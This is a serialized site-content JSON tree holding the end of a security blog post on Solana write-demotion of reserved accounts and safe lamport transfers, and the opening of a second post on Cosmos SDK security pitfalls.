"children":81673},{"style":385},[81674],{"type":30,"value":19659},{"type":24,"tag":301,"props":81676,"children":81677},{"style":348},[81678],{"type":30,"value":20507},{"type":24,"tag":301,"props":81680,"children":81681},{"style":385},[81682],{"type":30,"value":206},{"type":24,"tag":301,"props":81684,"children":81685},{"style":314},[81686],{"type":30,"value":81687},"is_upgradeable_loader_present",{"type":24,"tag":301,"props":81689,"children":81690},{"style":359},[81691],{"type":30,"value":14551},{"type":24,"tag":301,"props":81693,"children":81694},{"class":303,"line":3685},[81695],{"type":24,"tag":301,"props":81696,"children":81697},{"style":359},[81698],{"type":30,"value":698},{"type":24,"tag":32,"props":81700,"children":81701},{},[81702],{"type":30,"value":81703},"As you can see, there are two main causes of write-demotion:",{"type":24,"tag":6246,"props":81705,"children":81706},{},[81707,81719],{"type":24,"tag":2659,"props":81708,"children":81709},{},[81710,81712],{"type":30,"value":81711},"The account appears in the ",{"type":24,"tag":188,"props":81713,"children":81716},{"href":81714,"rel":81715},"https://github.com/anza-xyz/agave/blob/cd76bf6b8da8ec3739f0df4e087de0e50028b034/reserved-account-keys/src/lib.rs#L142-L182",[192],[81717],{"type":30,"value":81718},"reserved account list",{"type":24,"tag":2659,"props":81720,"children":81721},{},[81722],{"type":30,"value":81723},"The account is invoked as a program without the upgradable loader being present in the transaction.",{"type":24,"tag":32,"props":81725,"children":81726},{},[81727],{"type":30,"value":81728},"The second case is generally covered by the executable check implemented previously.",{"type":24,"tag":32,"props":81730,"children":81731},{},[81732],{"type":30,"value":81733},"The first case, however, is far more dangerous — it can silently break your program logic without any obvious cause. Let’s dig deeper into that.",{"type":24,"tag":270,"props":81735,"children":81737},{"id":81736},"the-reserved-account-list",[81738],{"type":30,"value":81739},"The Reserved Account List",{"type":24,"tag":32,"props":81741,"children":81742},{},[81743,81745,81750],{"type":30,"value":81744},"The Solana runtime maintains a ",{"type":24,"tag":188,"props":81746,"children":81748},{"href":81714,"rel":81747},[192],[81749],{"type":30,"value":81718},{"type":30,"value":81751},", which includes addresses with special semantics — such as built-in programs, precompiles, and sysvars.",{"type":24,"tag":32,"props":81753,"children":81754},{},[81755,81757,81764,81766,81771],{"type":30,"value":81756},"These accounts may initially behave like normal accounts. However, once they become reserved after a ",{"type":24,"tag":188,"props":81758,"children":81761},{"href":81759,"rel":81760},"https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474",[192],[81762],{"type":30,"value":81763},"feature gate is actived",{"type":30,"value":81765},", the runtime will ",{"type":24,"tag":60,"props":81767,"children":81768},{},[81769],{"type":30,"value":81770},"automatically demote them to read-only",{"type":30,"value":81772},", even if the transaction marked them as writable.",{"type":24,"tag":291,"props":81774,"children":81776},{"className":9818,"code":81775,"language":9817,"meta":7,"style":7},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n// Update active set of reserved account keys which are not allowed to be write locked\nself.reserved_account_keys = {\n let mut reserved_keys = ReservedAccountKeys::clone(&self.reserved_account_keys);\n reserved_keys.update_active_set(&self.feature_set);\n Arc::new(reserved_keys)\n};\n",[81777],{"type":24,"tag":145,"props":81778,"children":81779},{"__ignoreMap":7},[81780,81788,81796,81820,81874,81912,81941],{"type":24,"tag":301,"props":81781,"children":81782},{"class":303,"line":304},[81783],{"type":24,"tag":301,"props":81784,"children":81785},{"style":1062},[81786],{"type":30,"value":81787},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n",{"type":24,"tag":301,"props":81789,"children":81790},{"class":303,"line":320},[81791],{"type":24,"tag":301,"props":81792,"children":81793},{"style":1062},[81794],{"type":30,"value":81795},"// Update active set of reserved account keys which are not allowed to be write locked\n",{"type":24,"tag":301,"props":81797,"children":81798},{"class":303,"line":335},[81799,81803,81807,81812,81816],{"type":24,"tag":301,"props":81800,"children":81801},{"style":348},[81802],{"type":30,"value":20507},{"type":24,"tag":301,"props":81804,"children":81805},{"style":385},[81806],{"type":30,"value":206},{"type":24,"tag":301,"props":81808,"children":81809},{"style":359},[81810],{"type":30,"value":81811},"reserved_account_keys ",{"type":24,"tag":301,"props":81813,"children":81814},{"style":385},[81815],{"type":30,"value":523},{"type":24,"tag":301,"props":81817,"children":81818},{"style":359},[81819],{"type":30,"value":3035},{"type":24,"tag":301,"props":81821,"children":81822},{"class":303,"line":344},[81823,81827,81831,81836,81840,81845,81849,81853,81857,81861,81865,81869],{"type":24,"tag":301,"props":81824,"children":81825},{"style":348},[81826],{"type":30,"value":9838},{"type":24,"tag":301,"props":81828,"children":81829},{"style":348},[81830],{"type":30,"value":9843},{"type":24,"tag":301,"props":81832,"children":81833},{"style":369},[81834],{"type":30,"value":81835}," reserved_keys",{"type":24,"tag":301,"props":81837,"children":81838},{"style":385},[81839],{"type":30,"value":2537},{"type":24,"tag":301,"props":81841,"children":81842},{"style":10246},[81843],{"type":30,"value":81844}," ReservedAccountKeys",{"type":24,"tag":301,"props":81846,"children":81847},{"style":385},[81848],{"type":30,"value":10308},{"type":24,"tag":301,"props":81850,"children":81851},{"style":314},[81852],{"type":30,"value":22209},{"type":24,"tag":301,"props":81854,"children":81855},{"style":359},[81856],{"type":30,"value":362},{"type":24,"tag":301,"props":81858,"children":81859},{"style":385},[81860],{"type":30,"value":556},{"type":24,"tag":301,"props":81862,"children":81863},{"style":348},[81864],{"type":30,"value":20507},{"type":24,"tag":301,"props":81866,"children":81867},{"style":385},[81868],{"type":30,"value":206},{"type":24,"tag":301,"props":81870,"children":81871},{"style":359},[81872],{"type":30,"value":81873},"reserved_account_keys);\n",{"type":24,"tag":301,"props":81875,"children":81876},{"class":303,"line":401},[81877,81882,81886,81891,81895,81899,81903,81907],{"type":24,"tag":301,"props":81878,"children":81879},{"style":369},[81880],{"type":30,"value":81881}," reserved_keys",{"type":24,"tag":301,"props":81883,"children":81884},{"style":385},[81885],{"type":30,"value":206},{"type":24,"tag":301,"props":81887,"children":81888},{"style":314},[81889],{"type":30,"value":81890},"update_active_set",{"type":24,"tag":301,"props":81892,"children":81893},{"style":359},[81894],{"type":30,"value":362},{"type":24,"tag":301,"props":81896,"children":81897},{"style":385},[81898],{"type":30,"value":556},{"type":24,"tag":301,"props":81900,"children":81901},{"style":348},[81902],{"type":30,"value":20507},{"type":24,"tag":301,"props":81904,"children":81905},{"style":385},[81906],{"type":30,"value":206},{"type":24,"tag":301,"props":81908,"children":81909},{"style":359},[81910],{"type":30,"value":81911},"feature_set);\n",{"type":24,"tag":301,"props":81913,"children":81914},{"class":303,"line":415},[81915,81920,81924,81928,81932,81937],{"type":24,"tag":301,"props":81916,"children":81917},{"style":10246},[81918],{"type":30,"value":81919}," Arc",{"type":24,"tag":301,"props":81921,"children":81922},{"style":385},[81923],{"type":30,"value":10308},{"type":24,"tag":301,"props":81925,"children":81926},{"style":314},[81927],{"type":30,"value":21913},{"type":24,"tag":301,"props":81929,"children":81930},{"style":359},[81931],{"type":30,"value":362},{"type":24,"tag":301,"props":81933,"children":81934},{"style":369},[81935],{"type":30,"value":81936},"reserved_keys",{"type":24,"tag":301,"props":81938,"children":81939},{"style":359},[81940],{"type":30,"value":791},{"type":24,"tag":301,"props":81942,"children":81943},{"class":303,"line":439},[81944],{"type":24,"tag":301,"props":81945,"children":81946},{"style":359},[81947],{"type":30,"value":3118},{"type":24,"tag":270,"props":81949,"children":81951},{"id":81950},"consequences-silent-failures-and-bricked-programs",[81952],{"type":30,"value":81953},"Consequences: Silent Failures and Bricked Programs",{"type":24,"tag":32,"props":81955,"children":81956},{},[81957],{"type":30,"value":81958},"This behavior is especially dangerous when you constrain a program to be writable, for example, with anchor, it's pretty common to use the account(mut) constraint:",{"type":24,"tag":291,"props":81960,"children":81962},{"className":9818,"code":81961,"language":9817,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n #[account(mut)]\n pub throne: Account\u003C'info, Throne>,\n\n #[account(mut, constraint = old_king.key() == throne.king)]\n pub old_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub new_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub payer: Signer\u003C'info>,\n}\n",[81963],{"type":24,"tag":145,"props":81964,"children":81965},{"__ignoreMap":7},[81966,81981,82008,82023,82062,82069,82116,82147,82154,82169,82200,82207,82222,82253],{"type":24,"tag":301,"props":81967,"children":81968},{"class":303,"line":304},[81969,81973,81977],{"type":24,"tag":301,"props":81970,"children":81971},{"style":359},[81972],{"type":30,"value":29605},{"type":24,"tag":301,"props":81974,"children":81975},{"style":10246},[81976],{"type":30,"value":29610},{"type":24,"tag":301,"props":81978,"children":81979},{"style":359},[81980],{"type":30,"value":27029},{"type":24,"tag":301,"props":81982,"children":81983},{"class":303,"line":320},[81984,81988,81992,81996,82000,82004],{"type":24,"tag":301,"props":81985,"children":81986},{"style":348},[81987],{"type":30,"value":20484},{"type":24,"tag":301,"props":81989,"children":81990},{"style":348},[81991],{"type":30,"value":27920},{"type":24,"tag":301,"props":81993,"children":81994},{"style":10246},[81995],{"type":30,"value":78022},{"type":24,"tag":301,"props":81997,"children":81998},{"style":359},[81999],{"type":30,"value":29690},{"type":24,"tag":301,"props":82001,"children":82002},{"style":10246},[82003],{"type":30,"value":29695},{"type":24,"tag":301,"props":82005,"children":82006},{"style":359},[82007],{"type":30,"value":14097},{"type":24,"tag":301,"props":82009,"children":82010},{"class":303,"line":335},[82011,82015,82019],{"type":24,"tag":301,"props":82012,"children":82013},{"style":359},[82014],{"type":30,"value":29896},{"type":24,"tag":301,"props":82016,"children":82017},{"style":348},[82018],{"type":30,"value":10550},{"type":24,"tag":301,"props":82020,"children":82021},{"style":359},[82022],{"type":30,"value":27029},{"type":24,"tag":301,"props":82024,"children":82025},{"class":303,"line":344},[82026,82030,82034,82038,82042,82046,82050,82054,82058],{"type":24,"tag":301,"props":82027,"children":82028},{"style":348},[82029],{"type":30,"value":27612},{"type":24,"tag":301,"props":82031,"children":82032},{"style":369},[82033],{"type":30,"value":78061},{"type":24,"tag":301,"props":82035,"children":82036},{"style":385},[82037],{"type":30,"value":1679},{"type":24,"tag":301,"props":82039,"children":82040},{"style":10246},[82041],{"type":30,"value":29861},{"type":24,"tag":301,"props":82043,"children":82044},{"style":359},[82045],{"type":30,"value":29690},{"type":24,"tag":301,"props":82047,"children":82048},{"style":10246},[82049],{"type":30,"value":29695},{"type":24,"tag":301,"props":82051,"children":82052},{"style":359},[82053],{"type":30,"value":377},{"type":24,"tag":301,"props":82055,"children":82056},{"style":10246},[82057],{"type":30,"value":78086},{"type":24,"tag":301,"props":82059,"children":82060},{"style":359},[82061],{"type":30,"value":12957},{"type":24,"tag":301,"props":82063,"children":82064},{"class":303,"line":401},[82065],{"type":24,"tag":301,"props":82066,"children":82067},{"emptyLinePlaceholder":16},[82068],{"type":30,"value":341},{"type":24,"tag":301,"props":82070,"children":82071},{"class":303,"line":415},[82072,82076,82080,82084,82088,82092,82096,82100,82104,82108,82112],{"type":24,"tag":301,"props":82073,"children":82074},{"style":359},[82075],{"type":30,"value":29896},{"type":24,"tag":301,"props":82077,"children":82078},{"style":348},[82079],{"type":30,"value":10550},{"type":24,"tag":301,"props":82081,"children":82082},{"style":359},[82083],{"type":30,"value":78121},{"type":24,"tag":301,"props":82085,"children":82086},{"style":385},[82087],{"type":30,"value":523},{"type":24,"tag":301,"props":82089,"children":82090},{"style":359},[82091],{"type":30,"value":78130},{"type":24,"tag":301,"props":82093,"children":82094},{"style":385},[82095],{"type":30,"value":206},{"type":24,"tag":301,"props":82097,"children":82098},{"style":359},[82099],{"type":30,"value":78139},{"type":24,"tag":301,"props":82101,"children":82102},{"style":385},[82103],{"type":30,"value":607},{"type":24,"tag":301,"props":82105,"children":82106},{"style":359},[82107],{"type":30,"value":78061},{"type":24,"tag":301,"props":82109,"children":82110},{"style":385},[82111],{"type":30,"value":206},{"type":24,"tag":301,"props":82113,"children":82114},{"style":359},[82115],{"type":30,"value":78156},{"type":24,"tag":301,"props":82117,"children":82118},{"class":303,"line":439},[82119,82123,82127,82131,82135,82139,82143],{"type":24,"tag":301,"props":82120,"children":82121},{"style":348},[82122],{"type":30,"value":27612},{"type":24,"tag":301,"props":82124,"children":82125},{"style":369},[82126],{"type":30,"value":78130},{"type":24,"tag":301,"props":82128,"children":82129},{"style":385},[82130],{"type":30,"value":1679},{"type":24,"tag":301,"props":82132,"children":82133},{"style":10246},[82134],{"type":30,"value":32154},{"type":24,"tag":301,"props":82136,"children":82137},{"style":359},[82138],{"type":30,"value":29690},{"type":24,"tag":301,"props":82140,"children":82141},{"style":10246},[82142],{"type":30,"value":29695},{"type":24,"tag":301,"props":82144,"children":82145},{"style":359},[82146],{"type":30,"value":12957},{"type":24,"tag":301,"props":82148,"children":82149},{"class":303,"line":447},[82150],{"type":24,"tag":301,"props":82151,"children":82152},{"emptyLinePlaceholder":16},[82153],{"type":30,"value":341},{"type":24,"tag":301,"props":82155,"children":82156},{"class":303,"line":476},[82157,82161,82165],{"type":24,"tag":301,"props":82158,"children":82159},{"style":359},[82160],{"type":30,"value":29896},{"type":24,"tag":301,"props":82162,"children":82163},{"style":348},[82164],{"type":30,"value":10550},{"type":24,"tag":301,"props":82166,"children":82167},{"style":359},[82168],{"type":30,"value":27029},{"type":24,"tag":301,"props":82170,"children":82171},{"class":303,"line":495},[82172,82176,82180,82184,82188,82192,82196],{"type":24,"tag":301,"props":82173,"children":82174},{"style":348},[82175],{"type":30,"value":27612},{"type":24,"tag":301,"props":82177,"children":82178},{"style":369},[82179],{"type":30,"value":78229},{"type":24,"tag":301,"props":82181,"children":82182},{"style":385},[82183],{"type":30,"value":1679},{"type":24,"tag":301,"props":82185,"children":82186},{"style":10246},[82187],{"type":30,"value":32154},{"type":24,"tag":301,"props":82189,"children":82190},{"style":359},[82191],{"type":30,"value":29690},{"type":24,"tag":301,"props":82193,"children":82194},{"style":10246},[82195],{"type":30,"value":29695},{"type":24,"tag":301,"props":82197,"children":82198},{"style":359},[82199],{"type":30,"value":12957},{"type":24,"tag":301,"props":82201,"children":82202},{"class":303,"line":504},[82203],{"type":24,"tag":301,"props":82204,"children":82205},{"emptyLinePlaceholder":16},[82206],{"type":30,"value":341},{"type":24,"tag":301,"props":82208,"children":82209},{"class":303,"line":512},[82210,82214,82218],{"type":24,"tag":301,"props":82211,"children":82212},{"style":359},[82213],{"type":30,"value":29896},{"type":24,"tag":301,"props":82215,"children":82216},{"style":348},[82217],{"type":30,"value":10550},{"type":24,"tag":301,"props":82219,"children":82220},{"style":359},[82221],{"type":30,"value":27029},{"type":24,"tag":301,"props":82223,"children":82224},{"class":303,"line":592},[82225,82229,82233,82237,82241,82245,82249],{"type":24,"tag":301,"props":82226,"children":82227},{"style":348},[82228],{"type":30,"value":27612},{"type":24,"tag":301,"props":82230,"children":82231},{"style":369},[82232],{"type":30,"value":48977},{"type":24,"tag":301,"props":82234,"children":82235},{"style":385},[82236],{"type":30,"value":1679},{"type":24,"tag":301,"props":82238,"children":82239},{"style":10246},[82240],{"type":30,"value":29925},{"type":24,"tag":301,"props":82242,"children":82243},{"style":359},[82244],{"type":30,"value":29690},{"type":24,"tag":301,"props":82246,"children":82247},{"style":10246},[82248],{"type":30,"value":29695},{"type":24,"tag":301,"props":82250,"children":82251},{"style":359},[82252],{"type":30,"value":12957},{"type":24,"tag":301,"props":82254,"children":82255},{"class":303,"line":619},[82256],{"type":24,"tag":301,"props":82257,"children":82258},{"style":359},[82259],{"type":30,"value":698},{"type":24,"tag":32,"props":82261,"children":82262},{},[82263,82265,82271,82273,82279],{"type":30,"value":82264},"This works fine — until one day, ",{"type":24,"tag":145,"props":82266,"children":82268},{"className":82267},[],[82269],{"type":30,"value":82270},"old_king",{"type":30,"value":82272}," is silently demoted. Suddenly, the ",{"type":24,"tag":145,"props":82274,"children":82276},{"className":82275},[],[82277],{"type":30,"value":82278},"#[account(mut)]",{"type":30,"value":82280}," constraint fails, and your program is bricked. Even though you're passing a writable account in the transaction, the runtime has made a unilateral decision to override that.",{"type":24,"tag":270,"props":82282,"children":82284},{"id":82283},"real-world-example-write-demotion-with-secp256r1_program",[82285,82287],{"type":30,"value":82286},"Real-World Example: Write-Demotion with ",{"type":24,"tag":145,"props":82288,"children":82290},{"className":82289},[],[82291],{"type":30,"value":82292},"secp256r1_program",{"type":24,"tag":32,"props":82294,"children":82295},{},[82296,82298,82303],{"type":30,"value":82297},"Here’s a concrete example of the write-demotion trap playing out on mainnet — involving ",{"type":24,"tag":145,"props":82299,"children":82301},{"className":82300},[],[82302],{"type":30,"value":82292},{"type":30,"value":82304},", a precompiled program gated behind a feature flag:",{"type":24,"tag":291,"props":82306,"children":82308},{"className":9818,"code":82307,"language":9817,"meta":7,"style":7},"ReservedAccount::new_pending(\n secp256r1_program::id(),\n feature_set::enable_secp256r1_precompile::id(),\n)\n",[82309],{"type":24,"tag":145,"props":82310,"children":82311},{"__ignoreMap":7},[82312,82333,82353,82382],{"type":24,"tag":301,"props":82313,"children":82314},{"class":303,"line":304},[82315,82320,82324,82329],{"type":24,"tag":301,"props":82316,"children":82317},{"style":10246},[82318],{"type":30,"value":82319},"ReservedAccount",{"type":24,"tag":301,"props":82321,"children":82322},{"style":385},[82323],{"type":30,"value":10308},{"type":24,"tag":301,"props":82325,"children":82326},{"style":314},[82327],{"type":30,"value":82328},"new_pending",{"type":24,"tag":301,"props":82330,"children":82331},{"style":359},[82332],{"type":30,"value":1707},{"type":24,"tag":301,"props":82334,"children":82335},{"class":303,"line":320},[82336,82341,82345,82349],{"type":24,"tag":301,"props":82337,"children":82338},{"style":359},[82339],{"type":30,"value":82340}," secp256r1_program",{"type":24,"tag":301,"props":82342,"children":82343},{"style":385},[82344],{"type":30,"value":10308},{"type":24,"tag":301,"props":82346,"children":82347},{"style":314},[82348],{"type":30,"value":10313},{"type":24,"tag":301,"props":82350,"children":82351},{"style":359},[82352],{"type":30,"value":10318},{"type":24,"tag":301,"props":82354,"children":82355},{"class":303,"line":335},[82356,82361,82365,82370,82374,82378],{"type":24,"tag":301,"props":82357,"children":82358},{"style":359},[82359],{"type":30,"value":82360}," feature_set",{"type":24,"tag":301,"props":82362,"children":82363},{"style":385},[82364],{"type":30,"value":10308},{"type":24,"tag":301,"props":82366,"children":82367},{"style":359},[82368],{"type":30,"value":82369},"enable_secp256r1_precompile",{"type":24,"tag":301,"props":82371,"children":82372},{"style":385},[82373],{"type":30,"value":10308},{"type":24,"tag":301,"props":82375,"children":82376},{"style":314},[82377],{"type":30,"value":10313},{"type":24,"tag":301,"props":82379,"children":82380},{"style":359},[82381],{"type":30,"value":10318},{"type":24,"tag":301,"props":82383,"children":82384},{"class":303,"line":344},[82385],{"type":24,"tag":301,"props":82386,"children":82387},{"style":359},[82388],{"type":30,"value":791},{"type":24,"tag":32,"props":82390,"children":82391},{},[82392,82394,82399,82401,82407],{"type":30,"value":82393},"Before the ",{"type":24,"tag":145,"props":82395,"children":82397},{"className":82396},[],[82398],{"type":30,"value":82369},{"type":30,"value":82400}," feature is activated, this account behaves like any ordinary one. You can assign ",{"type":24,"tag":145,"props":82402,"children":82404},{"className":82403},[],[82405],{"type":30,"value":82406},"secp256r1_program::id()",{"type":30,"value":82408}," as the king in a contract.",{"type":24,"tag":32,"props":82410,"children":82411},{},[82412,82414,82419],{"type":30,"value":82413},"But once the feature is flipped on, the runtime silently marks it as read-only, blocking any future writes. As a result, ",{"type":24,"tag":145,"props":82415,"children":82417},{"className":82416},[],[82418],{"type":30,"value":82406},{"type":30,"value":82420}," becomes the eternal king, and no one can dethrone it.",{"type":24,"tag":270,"props":82422,"children":82424},{"id":82423},"fix-3-preventing-write-demotion-pitfalls",[82425],{"type":30,"value":82426},"Fix 3: Preventing Write-Demotion Pitfalls",{"type":24,"tag":32,"props":82428,"children":82429},{},[82430,82432,82437],{"type":30,"value":82431},"Alright, let’s try to fix this ",{"type":24,"tag":5422,"props":82433,"children":82434},{},[82435],{"type":30,"value":82436},"yet another",{"type":30,"value":82438}," edge case — and hopefully close the book on it.",{"type":24,"tag":270,"props":82440,"children":82442},{"id":82441},"attempt-1-block-known-reserved-accounts",[82443],{"type":30,"value":82444},"Attempt 1: Block Known Reserved Accounts",{"type":24,"tag":32,"props":82446,"children":82447},{},[82448],{"type":30,"value":82449},"One naive solution is to reject any known reserved account, for example:",{"type":24,"tag":291,"props":82451,"children":82453},{"className":47096,"code":82452,"language":47098,"meta":7,"style":7}," pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n+ assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",[82454],{"type":24,"tag":145,"props":82455,"children":82456},{"__ignoreMap":7},[82457,82465],{"type":24,"tag":301,"props":82458,"children":82459},{"class":303,"line":304},[82460],{"type":24,"tag":301,"props":82461,"children":82462},{"style":359},[82463],{"type":30,"value":82464}," pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n",{"type":24,"tag":301,"props":82466,"children":82467},{"class":303,"line":320},[82468],{"type":24,"tag":301,"props":82469,"children":82470},{"style":466},[82471],{"type":30,"value":82472},"+ assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",{"type":24,"tag":32,"props":82474,"children":82475},{},[82476,82478,82483],{"type":30,"value":82477},"This works in the short term, but doesn’t scale — you can’t predict all future additions to the ",{"type":24,"tag":145,"props":82479,"children":82481},{"className":82480},[],[82482],{"type":30,"value":82319},{"type":30,"value":82484}," list. The moment a new reserved account is introduced, your program becomes vulnerable again.",{"type":24,"tag":270,"props":82486,"children":82488},{"id":82487},"attempt-2-use-a-pda-vault",[82489],{"type":30,"value":82490},"Attempt 2: Use a PDA Vault",{"type":24,"tag":32,"props":82492,"children":82493},{},[82494,82496,82501],{"type":30,"value":82495},"A more future-proof fix is to avoid ",{"type":24,"tag":60,"props":82497,"children":82498},{},[82499],{"type":30,"value":82500},"transferring lamports to arbitrary accounts",{"type":30,"value":82502}," altogether.",{"type":24,"tag":32,"props":82504,"children":82505},{},[82506],{"type":30,"value":82507},"A clean approach would be to store the refund lamports in a PDA vault owned by your program. This prevents your logic from depending on accounts you don’t have complete control over, and sidesteps any risk of write-demotion or future account restrictions.",{"type":24,"tag":43,"props":82509,"children":82511},{"id":82510},"final-thoughts",[82512],{"type":30,"value":82513},"Final Thoughts",{"type":24,"tag":32,"props":82515,"children":82516},{},[82517],{"type":30,"value":82518},"Transferring lamports on Solana is not always straightforward and carries potential risks. Account constraints alone are insufficient to ensure safety, especially when dealing with runtime-specific edge cases.",{"type":24,"tag":32,"props":82520,"children":82521},{},[82522],{"type":30,"value":82523},"We can safely transfer lamports to an account under the following conditions:",{"type":24,"tag":2655,"props":82525,"children":82526},{},[82527,82532,82537],{"type":24,"tag":2659,"props":82528,"children":82529},{},[82530],{"type":30,"value":82531},"It's not executable.",{"type":24,"tag":2659,"props":82533,"children":82534},{},[82535],{"type":30,"value":82536},"Its balance, after the transfer, remains rent-exempt.",{"type":24,"tag":2659,"props":82538,"children":82539},{},[82540],{"type":30,"value":82541},"It's not a reserved account.",{"type":24,"tag":32,"props":82543,"children":82544},{},[82545],{"type":30,"value":82546},"This issue is not purely theoretical; it has impacted real-world programs. One significant case was recently reported to Jito via the bug bounty, which could have resulted in incorrect tip payments.",{"type":24,"tag":9672,"props":82548,"children":82549},{},[82550],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":82552},[82553,82554,82555,82561],{"id":35771,"depth":320,"text":35774},{"id":77936,"depth":320,"text":77939},{"id":79043,"depth":320,"text":79046,"children":82556},[82557,82558,82560],{"id":79049,"depth":335,"text":79052},{"id":79736,"depth":335,"text":82559},"Bug 2: Writable but Untouchable — set_lamports Fails",{"id":81040,"depth":335,"text":81043},{"id":82510,"depth":320,"text":82513},"content:blog:2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol",{"_path":82566,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":82567,"description":82568,"date":82569,"author":82570,"image":82571,"isFeatured":16,"onBlogPage":16,"tags":82573,"body":82576,"_type":9700,"_id":96450,"_source":9702,"_file":96451,"_stem":96452,"_extension":9705},"/blog/2025-06-10-cosmos-security","Cosmos Security: An Otter's Guide","From infinite loops and map determinism to AnteHandler missteps and storage key collisions, we highlight real-world vulnerabilities and actionable advice for building safer Cosmos-based projects.","2025-06-10","james",{"src":82572,"width":15,"height":15},"/posts/cosmos-security/title.png",[82574,82575],"cosmos-sdk","security",{"type":21,"children":82577,"toc":96428},[82578,82582,82587,82592,82598,82603,82608,82613,82874,83362,83381,83386,83391,83396,83402,83407,83442,83452,83959,83979,83992,83998,84003,84008,84249,84254,84262,84274,84636,84641,84646,84682,84691,85117,85138,85144,85164,85185,85204,85236,85248,85260,85914,85942,85951,86391,86418,86438,86443,86464,86513,86522,87747,87775,87781,87786,87791,87811,88098,88132,88313,88318,88323,88367,88376,89568,89819,89832,89838,89872,89877,89940,89945,89965,89984,89996,90015,90707,90712,90717,90745,90754,91638,91665,91671,91691,91696,91709,91882,91895,91986,91991,91999,92009,92159,92164,92184,92192,92197,92595,92607,92612,92653,92664,92684,92992,92997,93922,93934,93942,93947,94940,94945,94957,94977,94996,95910,95966,96072,96084,96089,96094,96122,96131,96357,96383,96396,96410,96414,96419,96424],{"type":24,"tag":43,"props":82579,"children":82580},{"id":35771},[82581],{"type":30,"value":35774},{"type":24,"tag":32,"props":82583,"children":82584},{},[82585],{"type":30,"value":82586},"The Cosmos SDK is an \"L1 toolkit\" for developers. It provides an open-source tool that enhances the ability to build application-specific L1 chains, all while prioritizing flexibility and control over the entire runtime environment. Unfortunately, with the convenience of the Cosmos SDK, security can be an oversight.",{"type":24,"tag":32,"props":82588,"children":82589},{},[82590],{"type":30,"value":82591},"In this comprehensive blog post, we break down security issues that are often overseen by developers, supported by real-world examples from live projects. Our goal is to provide a practical exploration of security vulnerabilities while also offering insights on how developers can identify and address these issues on their own.",{"type":24,"tag":43,"props":82593,"children":82595},{"id":82594},"its-loopin-time",[82596],{"type":30,"value":82597},"It's Loopin' Time",{"type":24,"tag":32,"props":82599,"children":82600},{},[82601],{"type":30,"value":82602},"There are notable differences in building app-specific L1s using the SDK and building contracts on established L1 chains. It is especially crucial to recognize that maintaining the stability of a blockchain is dependent on the developer.",{"type":24,"tag":32,"props":82604,"children":82605},{},[82606],{"type":30,"value":82607},"Below, we begin to demonstrate the differences between writing smart contracts with Solidity vs developing L1 with the Cosmos SDK.",{"type":24,"tag":32,"props":82609,"children":82610},{},[82611],{"type":30,"value":82612},"Here is a simple example for reference:",{"type":24,"tag":291,"props":82614,"children":82616},{"code":82615,"language":11299,"meta":7,"className":11300,"style":7},"function sumWithStride(\n uint64 start,\n uint64 stride,\n uint64[] memory arr\n) public returns (uint64) {\n uint64 idx = start;\n uint64 sum = 0;\n uint64 end = arr.length;\n\n while (idx \u003C end) {\n sum += arr[idx];\n idx += stride;\n }\n return sum;\n}\n",[82617],{"type":24,"tag":145,"props":82618,"children":82619},{"__ignoreMap":7},[82620,82636,82653,82669,82691,82720,82741,82765,82786,82793,82814,82831,82848,82855,82867],{"type":24,"tag":301,"props":82621,"children":82622},{"class":303,"line":304},[82623,82627,82632],{"type":24,"tag":301,"props":82624,"children":82625},{"style":348},[82626],{"type":30,"value":3205},{"type":24,"tag":301,"props":82628,"children":82629},{"style":314},[82630],{"type":30,"value":82631}," sumWithStride",{"type":24,"tag":301,"props":82633,"children":82634},{"style":359},[82635],{"type":30,"value":1707},{"type":24,"tag":301,"props":82637,"children":82638},{"class":303,"line":320},[82639,82644,82649],{"type":24,"tag":301,"props":82640,"children":82641},{"style":10246},[82642],{"type":30,"value":82643}," uint64",{"type":24,"tag":301,"props":82645,"children":82646},{"style":369},[82647],{"type":30,"value":82648}," start",{"type":24,"tag":301,"props":82650,"children":82651},{"style":359},[82652],{"type":30,"value":1729},{"type":24,"tag":301,"props":82654,"children":82655},{"class":303,"line":335},[82656,82660,82665],{"type":24,"tag":301,"props":82657,"children":82658},{"style":10246},[82659],{"type":30,"value":82643},{"type":24,"tag":301,"props":82661,"children":82662},{"style":369},[82663],{"type":30,"value":82664}," stride",{"type":24,"tag":301,"props":82666,"children":82667},{"style":359},[82668],{"type":30,"value":1729},{"type":24,"tag":301,"props":82670,"children":82671},{"class":303,"line":344},[82672,82676,82681,82686],{"type":24,"tag":301,"props":82673,"children":82674},{"style":10246},[82675],{"type":30,"value":82643},{"type":24,"tag":301,"props":82677,"children":82678},{"style":359},[82679],{"type":30,"value":82680},"[] ",{"type":24,"tag":301,"props":82682,"children":82683},{"style":348},[82684],{"type":30,"value":82685},"memory",{"type":24,"tag":301,"props":82687,"children":82688},{"style":369},[82689],{"type":30,"value":82690}," arr\n",{"type":24,"tag":301,"props":82692,"children":82693},{"class":303,"line":401},[82694,82698,82702,82707,82711,82716],{"type":24,"tag":301,"props":82695,"children":82696},{"style":359},[82697],{"type":30,"value":911},{"type":24,"tag":301,"props":82699,"children":82700},{"style":348},[82701],{"type":30,"value":68388},{"type":24,"tag":301,"props":82703,"children":82704},{"style":308},[82705],{"type":30,"value":82706}," 